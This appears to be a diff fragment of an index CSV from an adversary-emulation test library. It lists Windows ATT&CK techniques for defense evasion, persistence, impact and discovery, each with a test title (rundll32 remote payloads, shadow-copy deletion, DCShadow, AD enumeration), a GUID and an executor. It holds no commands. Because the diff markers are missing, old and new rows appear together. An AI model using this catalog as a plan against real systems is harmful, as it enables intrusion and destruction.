defense-evasion,T1036.003,Rename System Utilities,3,Masquerading - cscript.exe running as notepad.exe,3a2a578b-0a01-46e4-92e3-62e2859b42f0,command_prompt
defense-evasion,T1036.003,Rename System Utilities,4,Masquerading - wscript.exe running as svchost.exe,24136435-c91a-4ede-9da1-8b284a1c1a23,command_prompt
@@ -423,40 +195,23 @@ defense-evasion,T1036.003,Rename System Utilities,6,Masquerading - non-windows e
defense-evasion,T1036.003,Rename System Utilities,7,Masquerading - windows exe running as different windows exe,c3d24a39-2bfe-4c6a-b064-90cd73896cb0,powershell
defense-evasion,T1036.003,Rename System Utilities,8,Malicious process Masquerading as LSM.exe,83810c46-f45e-4485-9ab6-8ed0e9e6ed7f,command_prompt
defense-evasion,T1036.003,Rename System Utilities,9,File Extension Masquerading,c7fa0c3b-b57f-4cba-9118-863bf4e653fc,command_prompt
defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell
defense-evasion,T1564.006,Run Virtual Instance,1,Register Portable Virtualbox,c59f246a-34f8-4e4d-9276-c295ef9ba0dd,command_prompt
defense-evasion,T1564.006,Run Virtual Instance,2,Create and start VirtualBox virtual machine,88b81702-a1c0-49a9-95b2-2dd53d755767,command_prompt
defense-evasion,T1564.006,Run Virtual Instance,3,Create and start Hyper-V virtual machine,fb8d4d7e-f5a4-481c-8867-febf13f8b6d3,powershell
defense-evasion,T1207,Rogue Domain Controller,1,DCShadow - Mimikatz,0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,manual
defense-evasion,T1014,Rootkit,3,Windows Signed Driver Rootkit Test,8e4e1985-9a19-4529-b4b8-b7a49ff87fae,command_prompt
defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be,command_prompt
defense-evasion,T1218.011,Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt
defense-evasion,T1218.011,Rundll32,3,Rundll32 advpack.dll Execution,d91cae26-7fc1-457b-a854-34c8aad48c89,command_prompt
defense-evasion,T1218.011,Rundll32,4,Rundll32 ieadvpack.dll Execution,5e46a58e-cbf6-45ef-a289-ed7754603df9,command_prompt
defense-evasion,T1218.011,Rundll32,5,Rundll32 syssetup.dll Execution,41fa324a-3946-401e-bbdd-d7991c628125,command_prompt
defense-evasion,T1218.011,Rundll32,6,Rundll32 setupapi.dll Execution,71d771cd-d6b3-4f34-bc76-a63d47a10b19,command_prompt
defense-evasion,T1218.011,Rundll32,7,Execution of HTA and VBS Files using Rundll32 and URL.dll,22cfde89-befe-4e15-9753-47306b37a6e3,command_prompt
defense-evasion,T1218.011,Rundll32,8,Launches an executable using Rundll32 and pcwutl.dll,9f5d081a-ee5a-42f9-a04e-b7bdc487e676,command_prompt
defense-evasion,T1218.011,Rundll32,9,Execution of non-dll using rundll32.exe,ae3a8605-b26e-457c-b6b3-2702fd335bac,powershell
defense-evasion,T1218.011,Rundll32,10,Rundll32 with Ordinal Value,9fd5a74b-ba89-482a-8a3e-a5feaa3697b0,command_prompt
defense-evasion,T1218.011,Rundll32,11,Rundll32 with Control_RunDLL,e4c04b6f-c492-4782-82c7-3bf75eb8077e,command_prompt
defense-evasion,T1218.011,Rundll32,12,Rundll32 with desk.cpl,83a95136-a496-423c-81d3-1c6750133917,command_prompt
defense-evasion,T1134.005,SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
defense-evasion,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
defense-evasion,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,1,mavinject - Inject DLL into running process,c426dacf-575d-4937-8611-a148a86a5e61,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,2,SyncAppvPublishingServer - Execute arbitrary PowerShell code,d590097e-d402-44e2-ad72-2c6aa1ce78b1,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,3,Register-CimProvider - Execute evil dll,ad2c17ed-f626-4061-b21e-b9804a6f3655,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,4,InfDefaultInstall.exe .inf Execution,54ad7d5a-a1b5-472c-b6c4-f8090fb2daef,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,5,ProtocolHandler.exe Downloaded a Suspicious File,db020456-125b-4c8b-a4a7-487df8afb5a2,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,6,Microsoft.Workflow.Compiler.exe Payload Execution,7cbb0f26-a4c1-4f77-b180-a009aa05637e,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,7,Renamed Microsoft.Workflow.Compiler.exe Payload Executions,4cc40fd7-87b8-4b16-b2d7-57534b86b911,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,8,Invoke-ATHRemoteFXvGPUDisablementCommand base test,9ebe7901-7edf-45c0-b5c7-8366300919db,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,9,DiskShadow Command Execution,0e1483ba-8f0c-425d-b8c6-42736e058eaa,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,10,Load Arbitrary DLL via Wuauclt (Windows Update Client),49fbd548-49e9-4bb7-94a6-3769613912b8,command_prompt
defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
defense-evasion,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
defense-evasion,T1497.001,System Checks,4,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
defense-evasion,T1221,Template Injection,1,WINWORD Remote Template Injection,1489e08a-82c7-44ee-b769-51b72d03521d,command_prompt
defense-evasion,T1070.006,Timestomp,5,Windows - Modify file creation timestamp with PowerShell,b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c,powershell
defense-evasion,T1070.006,Timestomp,6,Windows - Modify file last modified timestamp with PowerShell,f8f6634d-93e1-4238-8510-f8a90a20dcf2,powershell
defense-evasion,T1070.006,Timestomp,7,Windows - Modify file last access timestamp with PowerShell,da627f63-b9bd-4431-b6f8-c5b44d061a62,powershell
@@ -466,29 +221,23 @@ defense-evasion,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token d
defense-evasion,T1222.001,Windows File and Directory Permissions Modification,1,Take ownership using takeown utility,98d34bb4-6e75-42ad-9c41-1dae7dc6a001,command_prompt
defense-evasion,T1222.001,Windows File and Directory Permissions Modification,2,cacls - Grant permission to specified user or group recursively,a8206bcc-f282-40a9-a389-05d9c0263485,command_prompt
defense-evasion,T1222.001,Windows File and Directory Permissions Modification,3,attrib - Remove read-only attribute,bec1e95c-83aa-492e-ab77-60c71bbd21b0,command_prompt
defense-evasion,T1222.001,Windows File and Directory Permissions Modification,4,attrib - hide file,32b979da-7b68-42c9-9a99-0e39900fc36c,command_prompt
defense-evasion,T1222.001,Windows File and Directory Permissions Modification,5,Grant Full Access to folder for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,command_prompt
defense-evasion,T1222.001,Windows File and Directory Permissions Modification,4,Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,powershell
defense-evasion,T1220,XSL Script Processing,1,MSXSL Bypass using local files,ca23bfb2-023f-49c5-8802-e66997de462d,command_prompt
defense-evasion,T1220,XSL Script Processing,2,MSXSL Bypass using remote files,a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985,command_prompt
defense-evasion,T1220,XSL Script Processing,3,WMIC bypass using local XSL file,1b237334-3e21-4a0c-8178-b8c996124988,command_prompt
defense-evasion,T1220,XSL Script Processing,4,WMIC bypass using remote XSL file,7f5be499-33be-4129-a560-66021f379b9b,command_prompt
persistence,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
persistence,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
persistence,T1098,Account Manipulation,9,Password Change on Directory Service Restore Mode (DSRM) Account,d5b886d9-d1c7-4b6e-a7b0-460041bf2823,command_prompt
persistence,T1137.006,Add-ins,1,Code Executed Via Excel Add-in File (Xll),441b1a0f-a771-428a-8af0-e99e4698cda3,powershell
persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
persistence,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
persistence,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
persistence,T1546.011,Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell
persistence,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
persistence,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
persistence,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
persistence,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
persistence,T1197,BITS Jobs,4,Bits download using destktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
@@ -497,28 +246,19 @@ persistence,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-
persistence,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
persistence,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
persistence,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
persistence,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
persistence,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
persistence,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
persistence,T1136.002,Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
persistence,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
persistence,T1136.001,Local Account,3,Create a new user in a command prompt,6657864e-0323-4206-9344-ac9cd7265a4f,command_prompt
persistence,T1136.001,Local Account,4,Create a new user in PowerShell,bc8be0ac-475c-4fbf-9b1d-9fffd77afbde,powershell
persistence,T1136.001,Local Account,6,Create a new Windows admin user,fda74566-a604-4581-a4cc-fbbe21d66559,command_prompt
persistence,T1078.003,Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
persistence,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
persistence,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
persistence,T1137,Office Application Startup,1,Office Application Startup - Outlook as a C2,bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c,command_prompt
persistence,T1137.002,Office Test,1,Office Application Startup Test Persistence,c3e35b58-fe1c-480b-b540-7600fb612563,command_prompt
persistence,T1137.004,Outlook Home Page,1,Install Outlook Home Page Persistence,7a91ad51-e6d2-4d43-9471-f26362f5738e,command_prompt
persistence,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
persistence,T1137.002,Office Test,1,Office Apllication Startup Test Persistence,c3e35b58-fe1c-480b-b540-7600fb612563,command_prompt
persistence,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
persistence,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
persistence,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
@@ -528,20 +268,13 @@ persistence,T1547.001,Registry Run Keys / Startup Folder,3,PowerShell Registry R
persistence,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious vbs file run from startup Folder,2cb98256-625e-4da9-9d44-f2e5f90b8bd5,powershell
persistence,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell
persistence,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
persistence,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
persistence,T1547.001,Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
persistence,T1547.001,Registry Run Keys / Startup Folder,9,SystemBC Malware-as-a-Service Registry,9dc7767b-30c1-4cc4-b999-50cab5e27891,powershell
persistence,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
persistence,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
persistence,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
persistence,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
persistence,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
persistence,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
persistence,T1053.005,Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
persistence,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
persistence,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
persistence,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
persistence,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
persistence,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
persistence,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
persistence,T1505.002,Transport Agent,1,Install MS Exchange Transport Agent Persistence,43e92449-ff60-46e9-83a3-1a38089df94d,powershell
@@ -550,7 +283,6 @@ persistence,T1546.003,Windows Management Instrumentation Event Subscription,1,Pe
persistence,T1543.003,Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
persistence,T1543.003,Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
persistence,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
persistence,T1543.003,Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt
persistence,T1547.004,Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
persistence,T1547.004,Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
persistence,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
@@ -558,25 +290,19 @@ impact,T1531,Account Access Removal,1,Change User Password - Windows,1b99ef28-f8
impact,T1531,Account Access Removal,2,Delete User - Windows,f21a1d7d-a62f-442a-8c3a-2440d43b19e5,command_prompt
impact,T1531,Account Access Removal,3,Remove Account From Domain Admin Group,43f71395-6c37-498e-ab17-897d814a0947,powershell
impact,T1485,Data Destruction,1,Windows - Overwrite file with Sysinternals SDelete,476419b5-aebf-4366-a131-ae3e8dae5fc2,powershell
impact,T1485,Data Destruction,3,Overwrite deleted data on C drive,321fd25e-0007-417f-adec-33232252be19,command_prompt
impact,T1486,Data Encrypted for Impact,5,PureLocker Ransom Note,649349c7-9abf-493b-a7a2-b1aa4d141528,command_prompt
impact,T1490,Inhibit System Recovery,1,Windows - Delete Volume Shadow Copies,43819286-91a9-4369-90ed-d31fb4da2c01,command_prompt
impact,T1490,Inhibit System Recovery,2,Windows - Delete Volume Shadow Copies via WMI,6a3ff8dd-f49c-4272-a658-11c2fe58bd88,command_prompt
impact,T1490,Inhibit System Recovery,3,Windows - wbadmin Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt
impact,T1490,Inhibit System Recovery,3,Windows - Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt
impact,T1490,Inhibit System Recovery,4,Windows - Disable Windows Recovery Console Repair,cf21060a-80b3-4238-a595-22525de4ab81,command_prompt
impact,T1490,Inhibit System Recovery,5,Windows - Delete Volume Shadow Copies via WMI with PowerShell,39a295ca-7059-4a88-86f6-09556c1211e7,powershell
impact,T1490,Inhibit System Recovery,6,Windows - Delete Backup Files,6b1dbaf6-cc8a-4ea6-891f-6058569653bf,command_prompt
impact,T1490,Inhibit System Recovery,7,Windows - wbadmin Delete systemstatebackup,584331dd-75bc-4c02-9e0b-17f5fd81c748,command_prompt
impact,T1490,Inhibit System Recovery,8,Windows - Disable the SR scheduled task,1c68c68d-83a4-4981-974e-8993055fa034,command_prompt
impact,T1490,Inhibit System Recovery,9,Disable System Restore Through Registry,66e647d1-8741-4e43-b7c1-334760c2047f,command_prompt
impact,T1491.001,Internal Defacement,1,Replace Desktop Wallpaper,30558d53-9d76-41c4-9267-a7bd5184bed3,powershell
impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt
impact,T1489,Service Stop,2,Windows - Stop service using net.exe,41274289-ec9c-4213-bea4-e43c4aa57954,command_prompt
impact,T1489,Service Stop,3,Windows - Stop service by killing process,f3191b84-c38b-400b-867e-3a217a27795f,command_prompt
impact,T1529,System Shutdown/Reboot,1,Shutdown System - Windows,ad254fa8-45c0-403b-8c77-e00b3d3e7a64,command_prompt
impact,T1529,System Shutdown/Reboot,2,Restart System - Windows,f4648f0d-bf78-483c-bafc-3ec99cd1c302,command_prompt
discovery,T1010,Application Window Discovery,1,List Process Main Windows - C# .NET,fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4,command_prompt
discovery,T1217,Browser Bookmark Discovery,4,List Google Chrome / Opera Bookmarks on Windows with powershell,faab755e-4299-48ec-8202-fc7885eb6545,powershell
discovery,T1217,Browser Bookmark Discovery,4,List Google Chrome Bookmarks on Windows with powershell,faab755e-4299-48ec-8202-fc7885eb6545,powershell
discovery,T1217,Browser Bookmark Discovery,5,List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt,76f71e2f-480e-4bed-b61e-398fe17499d5,command_prompt
discovery,T1217,Browser Bookmark Discovery,6,List Mozilla Firefox bookmarks on Windows with command prompt,4312cdbc-79fc-4a9c-becc-53d49c734bc5,command_prompt
discovery,T1217,Browser Bookmark Discovery,7,List Internet Explorer Bookmarks using the command prompt,727dbcdb-e495-4ab1-a6c4-80c7f77aef85,command_prompt
@@ -584,16 +310,7 @@ discovery,T1087.002,Domain Account,1,Enumerate all accounts (Domain),6fbc9e68-5a
discovery,T1087.002,Domain Account,2,Enumerate all accounts via PowerShell (Domain),8b8a6449-be98-4f42-afd2-dedddc7453b2,powershell
discovery,T1087.002,Domain Account,3,Enumerate logged on users via CMD (Domain),161dcd85-d014-4f5e-900c-d3eaae82a0f7,command_prompt
discovery,T1087.002,Domain Account,4,Automated AD Recon (ADRecon),95018438-454a-468c-a0fa-59c800149b59,powershell
discovery,T1087.002,Domain Account,5,Adfind -Listing password policy,736b4f53-f400-4c22-855d-1a6b5a551600,command_prompt
discovery,T1087.002,Domain Account,6,Adfind - Enumerate Active Directory Admins,b95fd967-4e62-4109-b48d-265edfd28c3a,command_prompt
discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Objects,e1ec8d20-509a-4b9a-b820-06c9b2da8eb7,command_prompt
discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
discovery,T1087.002,Domain Account,11,Get-DomainUser with PowerView,93662494-5ed7-4454-a04c-8c8372808ac2,powershell
discovery,T1087.002,Domain Account,12,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell
discovery,T1087.002,Domain Account,13,Enumerate Linked Policies In ADSISearcher Discovery,7ab0205a-34e4-4a44-9b04-e1541d1a57be,powershell
discovery,T1087.002,Domain Account,14,Enumerate Root Domain linked policies Discovery,00c652e2-0750-4ca6-82ff-0204684a6fe4,powershell
discovery,T1087.002,Domain Account,5,Adfind -Listing password policy,736b4f53-f400-4c22-855d-1a6b5a551600,powershell
discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
@@ -601,50 +318,27 @@ discovery,T1069.002,Domain Groups,4,Find machines where user has local admin acc
discovery,T1069.002,Domain Groups,5,Find local admins on all machines in domain (PowerView),a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd,powershell
discovery,T1069.002,Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell
discovery,T1069.002,Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell
discovery,T1069.002,Domain Groups,8,Adfind - Query Active Directory Groups,48ddc687-82af-40b7-8472-ff1e742e8274,command_prompt
discovery,T1069.002,Domain Groups,9,Enumerate Active Directory Groups with Get-AdGroup,3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8,powershell
discovery,T1069.002,Domain Groups,10,Enumerate Active Directory Groups with ADSISearcher,9f4e344b-8434-41b3-85b1-d38f29d148d0,powershell
discovery,T1069.002,Domain Groups,11,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell
discovery,T1069.002,Domain Groups,12,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell
discovery,T1069.002,Domain Groups,13,Get-DomainGroup with PowerView,5a8a181c-2c8e-478d-a943-549305a01230,powershell
discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt
discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt
discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell
discovery,T1482,Domain Trust Discovery,4,Adfind - Enumerate Active Directory OUs,d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec,command_prompt
discovery,T1482,Domain Trust Discovery,5,Adfind - Enumerate Active Directory Trusts,15fe436d-e771-4ff3-b655-2dca9ba52834,command_prompt
discovery,T1482,Domain Trust Discovery,6,Get-DomainTrust with PowerView,f974894c-5991-4b19-aaf5-7cc2fe298c5d,powershell
discovery,T1482,Domain Trust Discovery,7,Get-ForestTrust with PowerView,58ed10e8-0738-4651-8408-3a3e9a526279,powershell
discovery,T1083,File and Directory Discovery,1,File and Directory Discovery (cmd.exe),0e36303b-6762-4500-b003-127743b80ba6,command_prompt
discovery,T1083,File and Directory Discovery,2,File and Directory Discovery (PowerShell),2158908e-b7ef-4c21-8a83-3ce4dd05a924,powershell
discovery,T1083,File and Directory Discovery,5,Simulating MAZE Directory Enumeration,c6c34f61-1c3e-40fb-8a58-d017d88286d8,powershell
discovery,T1615,Group Policy Discovery,1,Display group policy information via gpresult,0976990f-53b1-4d3f-a185-6df5be429d3b,command_prompt
discovery,T1615,Group Policy Discovery,2,Get-DomainGPO to display group policy information via PowerView,4e524c4e-0e02-49aa-8df5-93f3f7959b9f,powershell
discovery,T1087.001,Local Account,8,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt
discovery,T1087.001,Local Account,9,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell
discovery,T1087.001,Local Account,10,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt
discovery,T1087.001,Local Account,11,Enumerate logged on users via PowerShell,2bdc42c7-8907-40c2-9c2b-42919a00fe03,powershell
discovery,T1069.001,Local Groups,2,Basic Permission Groups Discovery Windows (Local),1f454dd6-e134-44df-bebb-67de70fb6cd8,command_prompt
discovery,T1069.001,Local Groups,3,Permission Groups Discovery PowerShell (Local),a580462d-2c19-4bc7-8b9a-57a41b7d3ba4,powershell
discovery,T1069.001,Local Groups,4,SharpHound3 - LocalAdmin,e03ada14-0980-4107-aff1-7783b2b59bb1,powershell
discovery,T1069.001,Local Groups,5,Wmic Group Discovery,7413be50-be8e-430f-ad4d-07bf197884b2,powershell
discovery,T1069.001,Local Groups,6,WMIObject Group Discovery,69119e58-96db-4110-ad27-954e48f3bb13,powershell
